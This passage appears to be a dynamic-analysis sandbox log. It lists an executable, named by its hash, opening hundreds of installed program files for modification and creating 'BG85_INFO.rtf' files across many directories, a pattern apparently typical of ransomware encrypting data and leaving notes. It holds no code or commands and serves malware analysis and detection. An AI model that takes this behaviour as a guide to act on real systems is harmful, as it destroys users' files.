c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jre7\lib\zi\America\North_Dakota\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\as80.xsl c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Samarkand c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-applemenu_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Helsinki c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-core-kit_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-tabcontrol_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jre7\lib\zi\America\Indiana\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\liveleak.luac c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\YST9 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.engine.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.directorywatcher_1.1.0.v20131211-1531.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-13 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Danmarkshavn c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\MDIParent.zip c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\olh001.htm c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.commands.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.ui_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.text.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_fr.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\CET c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Casey c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\CloseUnprotect.docx c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jar.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\java-rmi.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\IA32.api c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Mozilla Maintenance Service\updater.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Abidjan c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Mozilla Firefox\defaults\pref\channel-prefs.js c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\id.pak c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kathmandu c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.common_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Manila c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui.configuration_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-ui_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\tnameserv.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\sunmscapi.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\hi\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Rio_Branco c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Cambridge_Bay c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\2d.x3d c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-swing-tabcontrol.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-threaddump.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\cmm\LINEAR_RGB.pf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\EScript.api c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javaw.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.historicaldata.ja_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\diagnostic-command-16.png c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\it.pak c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.rcp_4.3.100.v20141007-2301.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\core_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\dt.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\locale\updater_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-coredump_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Monterrey c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Dialog.zip c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\sysinfo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Stockholm c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr\default.jfc c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Accra c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\feature.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings_0.10.200.v20140424-2042.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.repository.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Dawson_Creek c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Windhoek c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Los_Angeles c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-attach.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Thule c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Thunder_Bay c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\EST c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\LICENSE c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\bin\policytool.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\bin\kinit.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jre7\lib\jfr\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Class.zip c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\EnableDismount.css c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\si\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-spi-actions_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\java.policy c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.jarprocessor.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-uihandler_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\prodbig.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ui.ja_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\North_Dakota\New_Salem c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\mobile.css c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Blanc-Sablon c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fontconfig.properties.src c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\epl-v10.html c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\da.pak c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Montevideo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Baghdad c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Brisbane c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\es.pak c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Mazatlan c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\larrow.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_globalstyle.css c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Mozilla Firefox\firefox.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.services.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\html\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\splash.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\VisualElements\SmallLogoCanary.png c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\EditResume.au c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Reunion c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Brunei c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Vancouver c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.mbeanbrowser.ja_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\jfluid-server-15.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Yekaterinburg c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_20_666666_40x40.png c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\fonts\FreeSans.ttf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\hr.pak c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Text.zip c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.transport.ecf.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Hermosillo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Bangkok c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Currie c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\EST5EDT c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Thimphu c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator\bundles.info c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-templates.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-io_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\jquery-ui-1.8.13.custom.css c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\fi.pak c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Khartoum c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program 